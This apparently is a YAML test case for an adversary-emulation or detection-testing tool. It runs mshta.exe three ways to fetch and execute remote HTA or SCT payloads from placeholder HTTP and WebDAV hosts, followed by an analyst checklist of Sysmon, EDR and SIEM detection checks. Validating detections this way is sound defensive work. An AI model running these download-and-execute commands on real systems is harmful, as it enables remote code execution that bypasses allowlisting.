id: DLEXEC_006_mshta_remote
name: "Download and Execute — MSHTA Remote HTA and SCT"
mitre: "T1218.005, T1105"
category: download_execute
description: >
  Executes remote payloads via mshta.exe using three methods: inline vbscript
  fetching a remote SCT file, direct HTA over HTTP, and HTA over WebDAV. MSHTA
  is a signed Microsoft binary that can execute remote script content and bypass
  many application allowlisting controls. Replace all PLACEHOLDER values.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-006] MSHTA method 1 — inline vbscript fetching remote SCT"

  - type: exec
    binary: mshta.exe
    args: 'vbscript:Close(Execute("GetObject(""script:PLACEHOLDER_HTTP_URL/payload.sct"")"))'
    timeout_seconds: 30

  - type: sleep
    seconds: 30

  - type: marker
    message: "[DLEXEC-006] MSHTA method 2 — direct remote HTA over HTTP"

  - type: exec
    binary: mshta.exe
    args: PLACEHOLDER_HTTP_URL/payload.hta
    timeout_seconds: 30

  - type: sleep
    seconds: 30

  - type: marker
    message: "[DLEXEC-006] MSHTA method 3 — HTA over WebDAV UNC"

  - type: exec
    binary: mshta.exe
    args: \\PLACEHOLDER_WEBDAV_HOST\PLACEHOLDER_FOLDER\payload.hta
    timeout_seconds: 30

  - type: sleep
    seconds: 30

analyst_checklist:
  - "Sysmon Event ID 1: mshta.exe with remote URL/UNC in commandline — all 3 methods logged?"
  - "Sysmon Event ID 3: Network connection from mshta.exe to remote host captured?"
  - "EDR: Alert on all 3 mshta.exe remote execution methods?"
  - "EDR: Method 1 (inline vbscript GetObject) detected vs method 2 (direct HTA)?"
  - "EDR: mshta.exe child processes captured — what did mshta.exe spawn?"
  - "SIEM: mshta.exe network events present?"
  - "Rule opportunity (critical): mshta.exe with HTTP URL or UNC path in commandline"
  - "Rule opportunity: mshta.exe spawning any child process"
  - "Rule opportunity: mshta.exe making outbound network connection"
  - "Gap check: Test which of the 3 methods fires — some EDRs only detect method 2."
